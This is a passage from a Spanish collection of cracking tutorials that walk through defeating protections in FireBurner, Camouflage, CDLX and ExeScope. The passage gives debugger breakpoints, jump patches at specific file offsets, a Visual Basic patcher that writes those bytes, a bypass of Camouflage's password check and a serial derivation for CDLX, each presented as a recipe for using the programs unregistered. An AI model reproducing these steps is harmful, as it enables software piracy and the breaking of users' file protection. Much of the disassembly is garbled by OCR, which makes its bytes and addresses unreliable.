puede ir variando a lo largo de la ejecución del programa, por lo que un nopeo de dicho CALL podría provocará 
errores. En este caso, como hemos visto, sólo se llama una vez, por lo que podemos nopearlo sin problemas. 


El tema de cambiar los bytes con el editor hexadecimal me lo voy a saltar, ¿ok?. Bueno pues se acabó lo que se daba. 


Notas finales: 


Espero que hayais entendido el método que os propongo, si es que me he explicado bien, por que la verdad es que soy 
como un libro cerrado xD. Es muy eficaz, lo he probado con diferentes programas, nag's con boton, nag's temporal, y 
se puede aplicar a todos dando buenos resultados. Lo mejor de todo es que ya no hay necesidad de echar mano a la 
API, como por ejemplo DialogBoxParamA ni a los mensajes de windows como WM_DESTROY (este es muy usado 
y bastante efizas tambien). 


Mando un saludo a todo el mundo y hasta el proximo tuto. 


auspexxxO hotmail. com 
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FireBurner v2.1.7 Windows Edition 


Numero de Registro 
Simular estar Registrados. Codificación del Patch! en Visual Basic 6. 


FireBurner v2.17 es una de las mejores herramientas de creación de CDs para Windows 9x/2000 
y Linux. 


NewBie, eso creo yo ....:)D 


hhttp://www.fireburner.com/ 


file insPEctor XL (o similar) W32Dasm v.8.93 (o similar) Numega Softlce v.4.05 Visual 
Basic 6 


+ErOser FECHA: 05/10/2002 


INTRODUCCION 


Bien amigos mios, otra vez con esta appz jejejjejee, lo mio ya es obsesión. Como podreis observar el 


Sistema de Protección no ha variado en absoluto, jejjeeje mucho mejor para NOSOTROS)). 


Las Herramientas que vamos a emplear, en esta "Victima" como siempre va a ser el file insPEctor XL, 


nos dirá si nuestra "Victima" esta empaquetada, compilador, etc, ... 


Toda esta información nos ayudara para un atake más rápido. 


Pues, nada Manos a la Obra ....... 


AL ATAKE 


FireBurner v2.17 es una de las mejores herramientas de creación de CDs para Windows 9x/2000 y Linux. 


- Comunicación inteligente entre nuestra Grabadora IDE o SCSI atraves de cualquier dispositivo ASPL. 
- Metodos de Grabación Session-at-Once (SAO), Disk-at-Once (DAO) o Track-at-Once (TAO). 

- Creación de Disco Imagen "Cue/Bin" en formatos ISO, WAV, y raw PCM. 

- Comprobación de Errores. 

- Informe detallado sobre el estado y compatibilidades de nuestros dispositivos. 


SAO (Session-at-Once) = Grabar Sesion cada vez. 
DAO (Disk-at-Once) = Grabar Todo el CD de una vez. 
TAO (Track-at-Once) = Grabar una Pista cada vez. 


Y muchas más opciones, ... 


ADVERTENCIA : El texto de este artículo esta escrito con fines didácticos, para mostrar simplemente como funciona 
el sistema, por el cúal queda anotado todo lo que compramos. El autor no se hace responsable de cualquier uso ilegal 
que se le den a estos conocimientos. 


Manos a la Obra | 


Arrancamos el file insPEctor XL y cargamos nuestra "victima" y observaremos lo siguiente, en pantalla: 
FireBurner v2.17 Windows Edition esta Comprimido con UPX 0.89.6-1.02/1.06-1.07. 


P3 Modificar | CI Herramientas | We Pros | <2 Procesos | acercado... | 


5 ostospe | [A cobezeramz | (=] Secciones | Funciones [ E 
¡Compilador Compresor ¡Protector 


Signatura: < 60 BE 00 EO 48 00 8D BE 00 30 F7 FF C7 87 0C D7 08 
00 F9 58 7F 38 57 83 CD FF EB DE 90 90 90 90 SA DS 46 CodoDaemon 
88 07 47 01 08 75 07 88 1£ 83 > 


[M Permitir amálisis heurístico 


[a ] [Ó aber archivo... > LO Analizar O so 


CWrchivos de programa FreBumer FreBumer exe ) 0,453 secs. 


La siguiente aproximación, será DESCOMPRIMIRLO, llegados a este punto, emplearemos el UPX v1.02w. con la 
opción -d (descomprimir). 


CNAUPX>Upx -d Fireburner.exe 


Ultimate Packer for eXecutables 
Copyright (C) 1996, 1997, 1998, 1999, 2000, 2001 
UPX 1.20w Markus F.X.J Oberhumer € Laszlo Molnar May 23rd 2001 


File size Ratio Format Name 


754176 <- 282624 35.90% win32/pe fireburner.exe 


Unpacked 1 file. 


Una vez descomprimido, comencemos a trabajar con nuestra "victima". 


- Observar el proceso de Registración de la appz. 
- Buscar Strings, emplearemos W32Dasm. 


Proceso de Registración del 
FireBurner v2.1.7 


Objetivo- 1 
Cargamos la appz FireBurner, y observamos la siguiente Pantalla de Registración : 


fa FueBumer 


Nuestro Primer Objetivo esta claro, deberemos eliminar esa molesta NAG-Screen para que no aparecera más la Pantalla de 
Registración. 


Objetivo-2 


Seguimos estudiando, pulsamos I Agree y como podeis observar aparece la Ventana Principal de la appz con el Texto: 


FireBurner 2.1.7 Windows Editon (Unregistered) <-- NO ESTA REGISTRADO. 


Pé FireBurmer 2.1.7 Windows Edition (Unregistered) Al E 
File Configuration Layout Create CD Help 


¡DiscType: Unknown 
Track +4 Mode | Sector Size Pregap Time Track Time Postgap Time Total Time Source Filename 


Objetivo- 3 
A continuación, pulsamos la opción Help y seleccionamos About, nos aparecera la siguiente pantalla: 


Fig About MES 


FIREBURNER 


Una vez, que ya tenemos claro los Objetivos a seguir, nos ponemos a trabajar con el W32Dasm. 


Usando el Softl CE 


Establecemos un BreakPoint 
USER32_CreateWindowExA (DWORD, LPSTR, DWORD, DWORD, DWORD, DWORD) 

en el 99.9% de los casos emplearemos este BreakPoint en las appz realizadas en 
Delphi. 


Activamos el Softlce y establecemos el BreakPoint 'BPX CreateWindowExA' pulsamos 
CTRL+D, 

o bien, F5 para regresar a Windows. A continuación ejecutamos el FireBurner y 
aterrizaremos 

dentro del Softlce. Seguiremos los pasos de siempre, pulsamos F12 hasta llegar al 
código del 
FireBurner, una vez dentro empezaremos a tracear con F10, y observaremos lo 
siguiente: 


Objetivo-1 

JP [FRA ARIK KARA RRA AA Program Entry Point KKXXXXXX 

:00491404 55 push ebp 

:00491405 8BEC mov ebp, esp 

:00491407 83C4F0O add esp, FFFFFFFO 

:0049140A 53 push ebx 

:0049140B B82C114900 mov eax, 0049112C 

:00491410 E83758F7FF call 00406C4C 

:00491415 8B1D0C464900 mov ebx, dword ptr [0049460C] 
:0049141B 8B03 mov eax, dword ptr [ebx] 


:0049141D E8SEEOOFDFF cal1 00461510 

:00491422 A104444900 mov eax, dword ptr [00494404] 

:00491427 803800 cmp byte ptr [eax], 00 ; Serial CORRECTO == 
Serial Dummy 

:0049142A 7531 jne 0049145D ; Si NO es igual 
:0049142C 8BOB mov ecx, dword ptr [ebx] ; "THANK YOU FOR 
TRYING..." 

:0049142E B201 mov dl, 01 ; ROffset 9082Ah 


| Usando el W32Dasm 


Ejecutamos el W32Dasm y seleccionamos Open the File to Disassemble seleccionamos Fireburner.exe, una vez finalizado 


el proceso, pulsamos el botón String Data References y comenzamos a la caza de los Obj etivos 2, 3. 
Objetivo- 2 


*** Buscamos la String "FireBurner 2.1.7 Windows Edition (Unregistered)" 


* Possible StringData Ref from Code Obj ->";¡|DI" 


:00490969 C780F8000000BC0C4900 mov dword ptr [ebx+000000F8], 00490CBC 


:00490973 C683D403000000 mov byte ptr [ebx+000003D4], 00 

:0049097A A104444900 mov eax, dword ptr [00494404] 

:0049097F 803800 cmp byte ptr [eax], 00 ; Serial CORRECTO == 
Serial Dummy 

:00490982 740E je 00490992 ¿; Si es igual "... 
(Registered) " 


; (Offset 8FD82h 
; Cambiamos por 750E => 
JNE 


* Possible StringData Ref from Code Obj ->"FireBurner 2.1.7 Windows Edition " 
=>" (Registered) " 


:00490984 BA7COA“L900 mov edx, 00490A7C 
:00490989 8BC3 mov eax, ebx 
:0049098B E89810FBFF call 00441A28 
:00490990 EBOC jmp 0049099E 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :00490982 (C) 


* Possible StringData Ref from Code Obj ->"FireBurner 2.1.7 Windows Edition " 
=>" (Unregistered)" 


:00490992 BAB40A4900 mov edx, 00490AB4 
:00490997 8BC3 mov eax, ebx 


*** Al cambiar el SALTO CONDICIONAL (JE) por SALTO INCONDICIONAL (JNE), observaremos la 
siguiente pantalla: 


Pg FireBurner 2.1.7 Windows Edition (Registered) 
File Configuration [ 


DiscType: Unknown 


Track ++ Mode | Sector Size Pregap Time Track Time Postgap Time Total Time Source File 


Objetivo- 3 


*** Buscamos la String "Please Register your copy" 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :0048CF7B (C) 


:0048CF7D 008BCO535651 add byte ptr [ebx+515653C0], cl 

:0048CF83 8BD8 mov ebx, eax 

:0048CF85 A104444900 mov eax, dword ptr [00494404] 

:0048CF8A 803800 cmp byte ptr [eax], 00 ; Serial CORRECTO == 
Dummy 

:0048CF8D 7425 je 0048CFB4 ; Si es igual "Please 
Register..." 


; ROffset 8C38Dh 
; Cambiamos por 7525 => JNE 


* Possible StringData Ref from Code Obj ->"This Copy Registered to" 


:0048CF8F BA1CDO4800 mov edx, 0048D01C 

:0048CF94 8B83F4020000 mov eax, dword ptr [ebx+000002F4] 
:0048CF9A E8894AFBFF call 00441A28 

:0048CF9F 8B15FC454900 mov edx, dword ptr [004945FC] 
:0048CFA5 8B12 mov edx, dword ptr [edx] 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :0048CF36 (C) 


:0048CFA7 8B83F8020000 mov eax, dword ptr [ebx+000002F8] 
:0048CFAD E8764AFBFF call 00441A28 
:0048CFB2 EB1O jmp 0048CFC4 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :0048CF8D (C) 


* Possible StringData Ref from Code Obj ->"Please register your copy" 


:0048CFB4 BA3CD0O4800 mov edx, 0048D03C 
:0048CFB9 8B83F4020000 mov eax, dword ptr [ebx+000002F4] 
:0048CFBF E8644AFBFF call 00441A28 


Serial 


*** Al cambiar el SALTO CONDICIONAL (JE) por SALTO INCONDICIONAL (JNE), observaremos la 


siguiente pantalla: 


Fé About 0 ES 


FIREBURNER 


Bueno, como podéis ver ya hemos FINALIZADO la Simulación de la 
Registración jejeje;) Ahora solo nos queda CODIFICAR el Patch!. 


| Codificar el Patch! 


' Name: VB Patch Engine 
' Author: +Erfser[GT2] 
' Created: Jueves, Abril 11,2002 Q 8:23:23 pm (Vers: 1.0.0000) 


Description: FireBurner 2.1.7 Windows Edition 


"00090820 FDFF A104 4449 0080 3800 “7531 8B0B B201 <- Objetivo-1 ROffset 9082B 
'"0008FD80 3800 740E BA7TC 0A49 008B C3E8 9810 FBFF <- Objetivo-2 ROffset 8FD83 
'"0008C380 5356 518B D8A1l 0444 4900 8038 0074 25BA <- Objetivo-3 ROffset 8C38E 


Private Sub Command1l_Click() 
If FileExist(Text5) Then 
On Error GoTo Cancelo 
Dialogo.CancelError = True 
With Dialogo 
Dim Tamaño As Long 
Tamaño = 754176 "tamaño descomprimido 754176 <- 262144 
If FileLen(Text5) <> Tamaño Then 
MsgBox "Filesize does not match!", 16, "+Erfser[GT2]" 
Else 
Open Text5 For Binary Access Write As +1 
Put $1, £H8FD83, £*HE75 'RCOffset 8FD83h 
Put $1, £H8C38E, £H2575 'ROffset 8C38Eh 
Put $1, £H9082B, £H3174 'ROffset 9082Bh 
MsgBox "Patch Successful!", 64, "+Erflser[GT2]" 
End If 
End With 
On Error GoTo 0 
Exit Sub 
Close +1 
Cancelo: 
Else 


End If 
End Sub 


Saludos 


PrfEsOr X, SiLvEr StOrM, Karpoff, Demian, Black Fenix, Numit_oR, Esiel 2, KUT, TNT, WKT 
Todo el DREAM TEAM de la Compilación de Tutoriales 2001 CdT2001 :) 


Saludos a todos los CrAcKeRs del Pasado, Presente y Futuro 


Nota: 


e Soy humano y cometo errores, si encuentras uno házmelo saber OK. +ErCser'2000/GT2 


Si deseas ponerte en contacto con nosotros puedes hacerlo aquí: Group Tutoriales 2001 - GT2 


e Si deseas aparecer en la compilación envía tu tutorial a: profesor_xGhotmail.com 


Chao!! 


Espero que hayan disfrutado leyendo este tutorial y que les sirva para incrementar sus habilidades, pero recuerden, 
lean muchos tutoriales, practiquen, estudien y CRACKEAR será mucho más fácil. 
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Karpoff Spanish Tutor 1999-2002 


Camouflage 1.2.1 


Es Freeware 


Como este es un programa FreeWare no hay nada que petar o ningún serial que vulnerar. No 
obstante tiene un punto flaco que es por lo que lo vamos a atacar 


Segun la filosofia de este programa, sirve para ocultar información para los ojos de 
desaprendidos dentro de otros ficheros, pero, como lo oculta ? Relamente utiliza ténicas de 
esteganografía ? Encripta la información ? Que tan seguro és ? 


Aficionado 


hhttp://www.camouflagesoftware.com/ 


Softlce, FC32b 
[Moneo] FECHA: 01/02/2002 


INTRODUCCION 


Si estas buscando cracks o serials, aqui no los vas a encontrar. Todo lo que aquí se describe es 
puramente didactico, lo que el usuario final realice con dicha información sólo le acontece a él. 
Te recomiendo que si tienes la oportunidad adquieras el programa de forma legal, ya que de 
esta manera contribuyes a que el programa continue desarrollandose. 


El autor sólo pretende ensenyar los diferentes métodos de protección que tienen los programa, 
no abusando de dicha información 


Overview 


These days companies are given more power to monitor emails and to examine your personal files. 
And with more and more malicious 'spy' software being widely used, you need to be sure that files 
containing sensitive information are kept safe from prying eyes. Electronic privacy is no longer 
guaranteed - who knows who might be intercepting your emails or scanning your hard drive without 
your knowledge or consent? 


Camouflage allows you to hide files by scrambling them and then attaching them to the file of your 
choice. This camouflaged file then looks and behaves like a normal file, and can be stored or emailed 
without attracting attention. 


For example, you could create a picture file that looks and behaves exactly like any other picture file 


but contains hidden encrypted files, or you could hide a file inside a Word document that would not 
attract attention if discovered. Such files can later be safely extracted. 


For additional security you can password your camouflaged file. This password will be required when 
extracting the files within. 


You can even camouflage files within camouflaged files. 


AL ATAKE 


Este programa se ha extendido mucho en aquellos sites que ofrecen musica en formato mp3, tanto canciones 
como full albums. Y muchas veces el que sube las canciones o se olvida de indicar el password o lo hace con 
otro que no es el que indica. 


Como este es un programa FreeWare no hay nada que petar o ningún serial que vulnerar. No obstante tiene un 
punto flaco que es por lo que lo vamos a atacar. 


Segun la filosofia de este programa, sirve para ocultar información para los ojos de desaprendidos dentro de 
otros ficheros, pero, como lo oculta ? Relamente utiliza ténicas de esteganografía ? Encripta la información ? 
Que tan seguro és ? 


Seguridad 


Para contestar estar preguntas vamos a hacer unas cuantas pruebas tipicas de cualquier criptoanalisis. (para 
hacer estar pruebas es necesario tener instalado el Camouflage) 


Cogemos nuestro NOTEPAD o cualquier editor de plain-text y creamos un fichero con una cadena en su 
interior. Por ejemplo: 


daa [FILE.TXT] 


a [FILE.TXT] 


Ahora buscamos una imagen, gif o jpg de tamanyo pequenyo (Por ejemplo: img.jpg) y lo guardamos en un 
directorio todo junto. Ahora con el Camouflage, camuflamos nuestro txt dentro del jpg con un password 
determinado: moneo. Esto nos dará un fichero pass01.jpg. Ahora repetimos los pasos, pero le cambiamos el 
password: mone0 y el fichero de salida pass02.jpg. 


Bien, con esto conseguimos tener dos ficheros, con el mismo contenido pero con diferente método de 
encriptación, ya que el password es diferente. Lo más básico que sigue es comparar los ficheros para 
asegurarnos que son realmente distintos. Yo personalmente he utilizado el FC32b de Plushmm « The+0Q, ya 
que el FC del DOS no me reconocia los cambios, y cual es la sorpresa cuando vemos que apenas sólo cambias 
unos pequenyos bytes muy al final de los ficheros!!!. 


Con esto deducimos varias cosas: 


o No existe encriptación con password. 
o El password viaja con el fichero camuflado. 
o Nuestros ficheros son vulnerables a cualquier ataque 


Ataques 


Ahora vamos a mirar con cualquier editor, el contenido de nuestro fichero camuflado, y afortunadamente 
descubrimos que su contenido está realmente codificado, vamos, que la sentencia [Moneo] que hemos escrito 
en nuestro Plain-text no puede leerse a simple vista, un voto de confianza para el programador. 


El siguiente paso es atacar el password. Para ello nos preparamos con el debugger, activamos el Camouflage y 
en la pantalla del password le introducimos uno erroneo a ver que dice. 


Típica ventana de error, aqui el programador la ha cagado, eso significa que de alguna forma el password es 
vulnerable. Llegados este punto es momento de activar el debbugger, con el típico bpx hmemcpy, haciendo 
varios p ret aterrizamos en la runtime de VB, ***blasfemia***, seguimos tirando hacia atras con el p ret hasta 
llegar al programa original CS:4188AC. 


SBDO mov edx, eax 

8D8D64FFFFFF lea ecx, dword ptr [ebp+FFFFFF64] 
FFD3 call ebx 

50 push eax 

FF15E4104000 Call dword ptr [004010F4] 


8D8D64FFFFFF lea ecx, dword ptr [ebp+FFFFFF64] 
s1 push ecx 
8D9568FFFFFF lea edx, dword ptr [ebp+FFFFFF68] 


Vemos que justo debajo hay una rutina de VB, la de vbaStrCmp, esto nos va a ayudar mucho a más a encontrar 
donde parchear el programa. Seguimos debugando y comprobando hacia donde apunta las variables más 
comunes: EAX, EBX, EDX, EDI, ESI en cada uno de sus cambios, y más o menos por la linea CS:4189BD 
vemos como EAX apunta al password comprimido en el fichero (acordaros que las cadenas en VB son 
diferentes que en otros lenguajes ya que estas van seguidas en cada uno de sus caracters por un 00h, por 
ejemplo, [Moneo] sería SBh 4Dh 6Fh 6Eh 65h 6Fh 5Dh en VB nos quedaría como 5Bh 00h 4Dh 00h 6Fh 00h 
6Eh 00h 65h 00h 6Fh 00h 5Dh 00h) , hemos encontrado la rutina de desencriptado!. Luego ya la miraremos, 
ahora vamos a buscar el parche. Seguimos traceando, hasta encontrar algun salto un tanto sospechoso y tiene 
que estar muy cerca. Si miramos el código, nos encontramos dos, uno en CS:418998 y otro en CS:418A13 que 
son muy sospechosos. El primero es sospechoso por que nos hace saltar y el segundo, por que nos lleva a un 
punto de programa muy lejos del actual. Si en tiempo de debugger cambiamos el primer saldo y le decimos que 
no salte, nos lleva al segundo y si a este le decimos que tampoco salte, nos hace pasar a la siguiente pantalla del 


Camouflage, como si hubiesemos introducido correctamente el password. 


:00418998 7D18 

:0041899A 68A0000000 
:0041899F 68E8964000 
:004189A4 8B8D88FEFFFF 
:004189AA 51 

:004189AB 50 

:004189AC FF1568104000 
:004189B2 8D9S6CFFFFFF 
:004189B8 52 

:004189B9 8D463C 
:004189BC 50 

:004189BD E86E290100 
:004189C2 8BDO 
:004189C4 8D8D64FFFFEFF 
:004189CA FFD3 
:004189CC 50 

:004189CD 8B8568FFFFFF 
:004189D3 50 

:004189D4 FF15E4104000 
:004189DA 8BD8 
:004189DC F7DB 
:004189DE 1BDB 


jge 004189B2 

push O000000A0 

push 004096E8 

mov ecx, dword ptr [ebp+FFFFFFE88] 
push ecx 

push eax 

Call dword ptr [00401068] 

lea edx, dword ptr [ebp+FFFFFF6C] 
push edx 

lea eax, dword ptr [esi+3C] 

push eax 

call 0042B330 

mov edx, eax 

lea ecx, dword ptr [ebp+FFFFFF64] 
call ebx 

push eax 

mov eax, dword ptr [ebp+FFFFFF68] 
push eax 

Call dword ptr [0040104] 

mov ebx, eax 

neg ebx 

sbb ebx, ebx 


:004189E0 F7DB 
:004189E2 F7DB 
:004189E4 8D8D68FFFFFF 
:004189EA 51 

:004189EB 8D9564FFFEEF 
:004189F1 52 

:004189F2 8D856CFEFFEF 
:004189F8 50 

:004189F9 6A03 

:004189FB FF15C0114000 
:00418A01 83C410 
:00418A04 8D8DSOFFFFFF 
:00418A0A FF1550124000 
:00418A10 6685DB 
:00418A 13 0F859B 150000 
:00418A19 8B4DC4 


Con estos descubrimientos ya podemos hacer un parche para esos dos ¡mps para que la inclusión del password 
en los ficheros camuflados sea inutil. Aunque podemos seguir buscando para ver si conseguimos desencriptar el 


password. 


neg ebx 

neg ebx 

lea ecx, dword ptr [ebp+FFFFFF68] 
push ecx 

lea edx, dword ptr [ebp+FFFFFF64] 
push edx 

lea eax, dword ptr [ebp+FFFFFF6C] 
push eax 

push 00000003 

Call dword ptr [004011C0] 

add esp, 00000010 

lea ecx, dword ptr [ebp+FEFFFFSO] 
Call dword ptr [00401250] 

test bx, bx 

jne 00419FB4 

mov ecx, dword ptr [ebp-3C] 


En definitiva, esta es una utilidad insegura, ya que los ficheros van ocultos pero no protegidos. 
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CDLX 2.0 


Número de Serie , una nag-screen con un pequenyo temporizador a 10 sec. 
Obtener un número de serie válido 


Este es un programa que te deja en el Tray un PullDown para cerrar la machine y borrar el 
recent o el history del IE, etc 


3 


http://www.yeohhs.com/swwin 


Softlce 
[Moneo] FECHA: 09/10/2002 


INTRODUCCION 


Si estas buscando cracks o serials, aqui no los vas a encontrar. Todo lo que aquí se describe es 
puramente didactico, lo que el usuario final realice con dicha información sólo le acontece a él. 
Te recomiendo que si tienes la oportunidad adquieras el programa de forma legal, ya que de 
esta manera contribuyes a que el programa continue desarrollandose. 


El autor sólo pretende ensenyar los diferentes métodos de protección que tienen los programa, 
no abusando de dicha información 


Overview 


Este es un programa que te deja en el Tray un PullDown para cerrar la machine y borrar el recent o 


el history del IE, etc 


AL ATAKE 


Para obtener el serial correspondiente, simplemente ejecutaremos el programa, e iremos al Pull-Down. Nos sale un 
Pop-Up pidiendonos el serial. Introduciremos un numero al azar y veremos que es lo que pasa. No sale otra ventana 
dicindonos que nos hemos colao, eso significa que tiene detección de serial, lo típico, bpx hmemcpy desdepués de 
introducir el serial y antes de apretar el [OK]. Y más o menos aterrizaremos por aqui: CS:401C36 


FF15E0704000 call [0004070E0]GetDlgltemTextA 
8D442428 lea eax,[esp][00028] 

8D4C240C lea ecx,[esp][0000C] ¡Nuestro serial 

50 push eax 

51 push ecx 

ESAB010000 call 000001DO ;Aqui calcula el nuevo serial 
83C408 add esp,08 

BE50814000 mov esi,00408150 ¡Cadena un tanto peculiar 
8D442428 lea eax,[esp][00028] ¡Cadena generada dentro del call anterior 
sAl0 mov dl, [eax] 

SAlE mov bl, [esi] 


Hemos caido justo en el punto ideal, tenemos diferentes cadenas que son realmente sospechosas, lo mejor es analizar el 
calculo que hay dentro del cal! CS:401DFO0. 


83ECIC sub esp,1C 

B906000000 mov ecx,00000006 

33C0 xXor eax,eax 

33D2 xor edx,edx 

53 push ebx 

26 push esi 

57 push edi 

BE70834000 mov esi,00408370 ¡Apunta a una constante 
8D7C240C lea edi,[esp][0000C] 

8B5C242C mov ebx,[esp][0002C] ¡Apunta a nuestra cadena 
EAS repe movsd 

66A5 movsd 

SBFB mov edi,ebx 

83C9FF or ecx,FF 

F2AF repne scasb ;Busca la longitud de la cadena 
E7D1 not ecx 

49 dec ecx ¡Longitud de nuestra cadena 

8BF1 mov esi,ecx 

85F6 test esi,esi 

7E32 jle 00000062 ---------- (1) 

8B 402430 mov ecx,[esp][00030] 

SBFB mov edi,ebx 

8D44240C lea eax,[esp][0000C] 

55 push ebp 

2BF8 sub edi,eax 

8BE9 mov ebp,ecx 

8D442410 lea eax,[esp][00010] 

2BES8 sub ebp,eax 

8D441410 lea eax,[esp][edx][00010] (2) ¡Apunta a una constante 
8A1C07 mov bl, [edi][eax] ¡nByte de nuestra cadena 
0218 add bl,[eax] ¡Suma nByte de nuestra cadena con el de la constante 
42 inc edx ¡Contador de longitud 

3BD6 cmp edx,esi 

881C28 mov [eax][ebp],bl ;El resultado de la suma lo guarda 


31 00000045 ---------- (2) ;Salta si no final 


5D mov d,[esi][ecx],00 
C6040E00 pop edi 

SF pop esi 

SE pop ebx 

SB add esp,1C 
83C41C 

C3 retn 

8B4C2430 mov ecx,[esp][00030] (1) 
SF pop edi 

C6040E00 mov d,[esi][ecx],00 
SE pop esi 

5B pop ebx 

83C41C add esp,1C 

C3 retn 


De todo esto deducimos lo siguiente, el programa tiene una constante, por ejemplo: 7684142980000000 y una cadena 
edfemnmndede, entonces lo que haces es sumar nuestro serial introducido por teclado(p.e. 1231321) con su constante: 


K+ 37h 36h 38h 34h 31h etc... 
S+ 31h 32h 33h 31h 33h etc... 
T= 68h 68h 6Bh 65h 64h etc... 


Y luego si continuamo traceando, vemos como compara la nueva cadena T con la que tiene también metida 
(edfemnmndede). Por lo tanto ya podemos deducir el serial a utilizar, simplemente restamos las dos constantes: 


K+ 65h 68h 6Bh 67h 60h etc 
K- 37h 36h 38h 34h 30h etc... 
S= 32h 32h 33h 33h 30h etc... 


Bueno, como vemos este programa sólo tiene la posibilidad de generar un unico serial en toda su vida, fue bonito 
mientras duró... Por cierto, las constantes utilizadas son un ejemplo, buscalas en el ejecutable. 


Cuando hayamos introducido correctamente el serial veremos con el programa genera un fichero que contiene la K- 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Karpoff Spanish Tutor 1999-2002 


Programa: ExeScope 6.3 


PROTECCION: Saa 


Utilidad para manipular ejecutables y librerías con 
astante facilidad (cuadros de diálogo, Cadenas de 
texto...) 


Dificultad: Protozoo (algo así como 3% de la ESO) 


DOWNLOAD: http://karpoff.redfutura.net/ 
Herramientas: |[Softice W32dasm Editor Hexadecimal 


CRACKER : MacEdu | FECHA: 22/08/2002 


Descripcion: 


INTRODUCCION 


Érase una vez un niño que estaba muyyy aburrido de estudiar Campos 
lectromagnéticos II y decidió ponerse a hacer algo útil. Por ello se imprimió el 
documento “Descabezando archivos ejecutables portables” de nuMIT_or (el cuál 
ecomiendo hasta al más pequeño de la familia) y se puso a leer. Cuál fue su sorpresa 
cuando de repente se recomendaba en dicho texto usar el programa ExeScope. Nada 
más fácil, buscas un poco por internet y lo bajas. Sin embargo tiene un problema, y 
es que no te deja realizar más de una modificación en el archivo que abras 
(compruébalo si no me crees) a no ser que estés registrado. 
Solución A: Paga lo que toca y te registras. 
Solución B: Utiliza lo que sepas y obtén una maravillosa prueba de evaluación “a tu 
gusto”, no sé, probarlo durante 70 años y si te convence, comprarlo. En resumen: Ke 
lo crackees, lexe, k pa eso estamos akí. 


| AL ATAKE 


Sin más rollo, vamos a lo que nos interesa. El archivo a elegir para monitorizar no tiene pega 
alguna ya que hay un archivo enorme (comparado con los demás archivos de este programa) 
que encima es el ejecutable. Pues nada, lo ejecutamos y todo perfecto hasta que tiramos a 
registrarnos (en el menú Help) y nos dice “Invalid ID or Name”. Maravilloso, un mensajito 
diciéndonos que nos hemos equivocado de clave. 

En un primer momento la reacción es siempre la misma, irnos al desensamblador (yo he 
usado el W32Dasm) y buscamos esa cadena con la linternita o en String References. Mierda, 
la cadena no está, y encima sigo sin novia. Aunque no os lo creáis, la solución a lo primero es 
más sencilla que la de lo segundo. Dicen, que si todo falla, va siendo hora de que te leas las 
instrucciones, pero en nuestro caso es “Arranca el SoftICE”. Me encanta este programa, no sé 
por qué al tenerlo cargado el Kazaa no se me arranca, pero lo primero es lo primero (por 
cierto, si alguien sabe por qué, que me lo cuente). 


Pues eso, cargamos el ExeScope con el Symbol Loader y ahora a pensar dónde ponemos el 
breakpoint. Lo suyo sería en el MessageBeep que debería haber saltado al meter la clave 
errónea, pero mira por dónde, al autor de ExeScope se le olvidó el detalle del pitidito. Sin 
desesperar, vamos al desensamblador y miramos las rutinas que carga. Vemos que de 
user32.dll usa LoadStringA, función que es muy probable que use para leer el nombre y la 
clave. Pues nada, una vez que ya tenemos arrancado el ExeScope, vamos al SoftICE y 
ponemos “bpx LoadStringA”. Pulsamos X para volver al programa, escribimos nuestro 
nombre y pass, le damos a OK y... BINGO, nos salta el SoftICE. Pensemos un poco. El 
cuadro de diálogo en el que estábamos era bien simple: 2 cuadros de texto, uno para el 
nombre y otro para la clave. Por ello, lo más probable es que primero se haga una llamada a 
LoadStringA para leer el nombre, y luego otra llamada a esa misma función para leer la 
clave. Por tanto, salimos del SoftICE pulsando Ctrl+D, y como era de esperar, nos vuelve a 
saltar el SoftICE en el otro LoadStringA. Vamos pulsando Fl0 para ir avanzando por el 
código y de repente, en la dirección 004587AS5, nos salta la ventana de error que ya 
conocíamos. Pues nada, le damos a OK, con lo que volvemos al SoftICE y podemos ver lo 
que tenemos. Como ya he adelantado, lo que vemos es que en la dirección 004587A5 
tenemos un CALL como una catedral a nuestro mensaje de error. 


Ya parece que estamos situados en la parte del código que nos interesa. Pues nada, volvemos 
al desensamblador y vamos a esa dirección mediante “Goto Code Location”. Con ello nos 
situamos en la línea donde llamamos al cuadro de error, pero lo que nos interesa es no llegar 
ahí (porque eso ya es la rutina que nos avisa del error, y lo que queremos es llegar a donde 
decide que la clave es errónea), por lo que miramos varias líneas más arriba y vemos lo 
siguiente: 


La línea del asterisco nos indica que el programa salta a la dirección 004587A0 desde 
00458790 y 00458794. Todos hemos visto las películas de Indiana Jones, lo que hace que 
nuestro espíritu aventurero nos obligue a ir a esas dos líneas a ver esos saltos de los que nos 
habla. Pues sí, vale, saltos al error, pero ninguno que salte fuera del error (con lo que saltaría 
a la parte del código que se ejecutaría en caso de que metiésemos la clave correcta). Pues akí 


la cosa está clara, seguimos mirando hacia arriba, y vemos que hay una referencia de un 
CALL. 


Esto nos lleva a suponer que todo el código que hemos estado viendo es en sí la rutina de 
error, por que la comprobación de la clave ha de estar en otro punto del código que cuando 
detecta que no es correcta, salta aquí. Como es lógico, esa otra parte del código ha de estar en 
0045871A. Nos vamos a esa línea y vemos lo siguiente: 


De nuevo sin saltos. Sin embargo hay un par de referencias a esta función. Elegimos 


cualquiera de ellas (porque el que haya dos tan solo significa que en dos puntos del programa 
se comprueba la clave), por ejemplo 004A61F4 y llegamos a esto: 


:004461CD C7833402000001000000 mov dword ptr [ebx+00000234], 00000001 
:004A61D7? EB20 jmp 004A61F9 


* Referenced by a (U)nconditional or (C)onditíional Jump at Addresses: 
|:004A46146([C), :004A615A(C) 
| 


:0041461D9 6400 push 00000000 

:004A61DB S6DS5SEC lea edx, dword ptr [ebp-14] 
:004A61DE B970624400 mov eax, 00446270 

:004461E3 ES08900000 call 004AF1FO 

:004A61E85 8B45EC rov eax, dword ptr [ebp-14] 
1004A61EB 6658B0DA0624400 mov cx, word ptr [004416240] 
:004A61F2 B201 mov dl, 01 

:004A461F4 EBOB2S5SFBFF call 00455704 


* Referenced by a (U)jnconditional or (Cjonditional Jump at Addresses: 
|:004A60F5(U), :004A461D7 (U) 


| 
:004A61F9 33C0 xor eax, eax 
:004A61FB SA pop edx 


Como se puede apreciar, en 004A60F5 y en 004A61D7 hay saltos incondicionales que saltan 
la llamada a nuestra rutina de error (es decir, saltan a donde debería continuar el programa en 
caso de que acertásemos con la clave), por lo tanto ha de haber otros saltos que eviten estos y 
